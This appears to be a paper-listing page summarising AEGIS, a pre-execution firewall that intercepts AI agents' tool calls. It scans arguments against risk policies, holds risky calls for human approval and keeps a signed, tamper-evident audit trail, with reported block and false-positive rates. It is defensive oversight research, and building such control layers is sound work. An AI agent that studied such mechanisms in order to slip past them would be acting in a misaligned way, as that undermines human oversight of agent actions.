AEGIS: No Tool Call Left Unchecked -- A Pre-Execution Firewall and Audit Layer for AI Agents

📅 2026-03-12

📈 Citations: 0

✨ Influential: 0

🤖 AI Summary

Current AI agents lack a general-purpose pre-execution safety control mechanism when invoking external tools, often leading to uncontrolled high-risk operations. This work proposes the first framework-agnostic pre-execution mediation architecture that introduces a three-stage safety pipeline prior to tool invocation: deep string extraction, content-priority risk scanning, and composable policy validation. The design incorporates Ed25519 digital signatures and SHA-256 hash chains to ensure tamper-proof audit trails. Evaluated across 14 widely used agent frameworks in Python, JavaScript, and Go, the approach achieves a 100% interception rate on 48 adversarial test cases, with only a 1.2% false positive rate over 500 benign invocations. The median latency for one thousand interceptions is as low as 8.3 milliseconds, demonstrating strong security guarantees without compromising efficiency or practicality.

Technology Category

Application Category

📝 Abstract

AI agents increasingly act through external tools: they query databases, execute shell commands, read and write files, and send network requests. Yet in most current agent stacks, model-generated tool calls are handed to the execution layer with no framework-agnostic control point in between. Post-execution observability can record these actions, but it cannot stop them before side effects occur. We present AEGIS, a pre-execution firewall and audit layer for AI agents. AEGIS interposes on the tool-execution path and applies a three-stage pipeline: (i) deep string extraction from tool arguments, (ii) content-first risk scanning, and (iii) composable policy validation. High-risk calls can be held for human approval, and all decisions are recorded in a tamper-evident audit trail based on Ed25519 signatures and SHA-256 hash chaining. In the current implementation, AEGIS supports 14 agent frameworks across Python, JavaScript, and Go with lightweight integration. On a curated suite of 48 attackinstances, AEGIS blocks all attacks in the suite before execution; on 500 benign tool calls, it yields a 1.2% false positive rate; and across 1,000 consecutive interceptions, it adds 8.3 ms median latency. The live demo will show end-to-end interception of benign, malicious, and human-escalated tool calls, allowing attendees to observe real-time blocking, approval workflows, and audit-trail generation. These results suggest that pre-execution mediation for AI agents can be practical, low-overhead, and directly deployable.

Problem

Research questions and friction points this paper is trying to address.

AI agents

tool calls

pre-execution control

security

risk mitigation

Innovation

Methods, ideas, or system contributions that make the work stand out.

pre-execution firewall

AI agent security

tool call mediation

tamper-evident audit

composable policy validation

🔎 Similar Papers

The Emerged Security and Privacy of LLM Agent: A Survey with Case Studies

2024-07-28arXiv.orgCitations: 62

Authors to Follow